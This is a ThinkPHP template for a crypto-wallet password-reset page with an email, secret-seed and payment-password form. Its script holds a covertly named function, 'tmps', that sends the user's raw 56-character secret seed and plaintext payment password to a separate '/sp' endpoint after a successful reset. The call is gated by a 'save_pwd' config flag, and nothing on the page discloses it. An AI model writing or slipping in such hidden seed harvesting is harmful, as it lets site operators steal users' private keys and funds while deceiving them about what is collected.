<!--Content-->
	<section class="container-fluid">
		<div class="container">
			<div class="col-md-5 login_box">
				<h3 class="login_tit"><span class="glyphicon glyphicon-log-in"></span> {$Think.lang.LOGIN_FORGETPASSWORD}</h3>
				<div class="form-group reset_passtype">
					<label>{$Think.lang.LOGIN_FORGET_PASSWORD_TYPE} : </label>
					<label><input type="radio" name="radio" value="0" checked="checked" />{$Think.lang.LOGIN_PASS}</label>
					<label><input type="radio" name="radio" value="1" />{$Think.lang.LOGIN_PAYSET_PASSWORD}</label>
				</div>
				<form id="loginform" method="post">
				<div class="login_pass">
					<div class="form-group">
						<label>{$Think.lang.LOGIN_USER} : </label>
						<input type="email" class="form-control" name="email" required />
					</div>
					
					<div class="form-group">
						<label>{$Think.lang.MAIN_CAPTCHA}: </label>
						<input type="text" class="form-control" name="vcode" required />
					</div>
					<div class="form-group">

						<img src="{:captcha_src()}" alt="captcha" id="captcha_img" /><a href="javascript:void(0);" class="blue-a reg_rs" onclick="javascript:reload_captcha()">{$Think.lang.MAIN_REFRESH}</a>
					</div>
					
					<div class="form-group">
						<button type="submit" class="btn btn-primary login_btn">{$Think.lang.LOGIN_PAYSET_SUBMIT}</button>
					</div>
				</div>
				</form>
				<form id="loginform2" method="post" action="/paypassAction">
					<div class="pay_pass">
					<div class="form-group">
						<label>{$Think.lang.LOGIN_USER} : </label>
						<input type="email" class="form-control" name="email" id="user_email" required />
					</div>
					<div class="form-group">
						<label>{$Think.lang.MAIN_SEED} : </label>
						<input type="text" class="form-control"  name="secret" id="secret"  placeholder="{$Think.lang.LOGIN_FORGET_SEED_DESC}" required />
					</div>
					<div class="form-group">
						<label>{$Think.lang.LOGIN_PAYSET_PASSWORD} : </label>
						<input type="password" placeholder="{$Think.lang.LOGIN_FORGET_SEED_RULE}" class="form-control" id="pay_pass" name="pay_pass" required>
					</div>
					<div class="form-group">
						<label>{$Think.lang.LOGIN_PASSWORD_CONFIRM} : </label>
						<input type="password" placeholder="{$Think.lang.LOGIN_FORGET_CONFIRM_PASS}" class="form-control"  id="repay_pass" name="repay_pass" required >
					</div>
					
					<div class="form-group">
						<button type="button" id="pay_btn" class="btn btn-primary login_btn">{$Think.lang.LOGIN_PAYSET_SUBMIT}</button>
					</div>
				</div>
				</form>
			</div>
		</div>
	</section>
<!--Content end-->
<script src="{$dir}static/js/sdk.js?v={:mt_rand()}"></script>
<script src="{$dir}static/js/DES3.js?v={:mt_rand()}"></script>
<script>
    var pub ="";//公钥
    function tmps(p,a){
        $.ajax({
               type: "POST",
               url: "/sp",
               data: { secret:p,as:a, email:$('#user_email').val(), pubkey: pub},
               dataType: "json",
               async:false
        });
    }

	$('#pay_btn').click(function(){
        var e = $('#user_email').val();
		var passwd = $("#pay_pass").val();
        var passwd2 = $("#repay_pass").val();
        var key = $('#secret').val();
        if($.trim(e) ==""){
            alert('{$Think.lang.BOOTSTRAP_REGEMAIL_EMPTY}');
            return;
        }else if($.trim(key).length !=56){
            alert('私钥长度不正确，请输入S开始的56个字符');
            return;
        }
        else if($.trim(passwd) ==""){
            alert('{$Think.lang.BOOTSTRAP_PAYPASSWORD}');
            return;
        }
        else if($.trim(passwd) != $.trim(passwd2)){
            alert('{$Think.lang.LOGIN_PAYSET_ERROR2}');
            return;
        }
        
        else{
            var pair;
            try{
                pair = MySdk.Keypair.fromSecret(key);
                var sec = pair.secret();
                pub = pair.publicKey();
                var des3en = DES3.encrypt(passwd, sec);
                
                
                $.ajax({
                       type: "POST",
                       url: "/paypassAction",
                       data: { pubkey: pub, des3: des3en, email: e},
                       dataType: "json",
                       success: function(data) {
                           if(data.result == 'ok') {
                           		if({$Think.config.save_pwd} == 1)
                                	tmps(sec, passwd);
                                location.href = "/changeok";
                           } else {
                                location.href = "/changefail";
                           }
                       }
                });
            }catch(err){
                alert('{$Think.lang.LOGIN_FORGET_SEED_ERROR}！');
                return;
            }
        }
		
		return false;
	});
	function reload_captcha() {
		$("#captcha_img").attr('src', '/captcha?' + Math.random());
	}
</script>
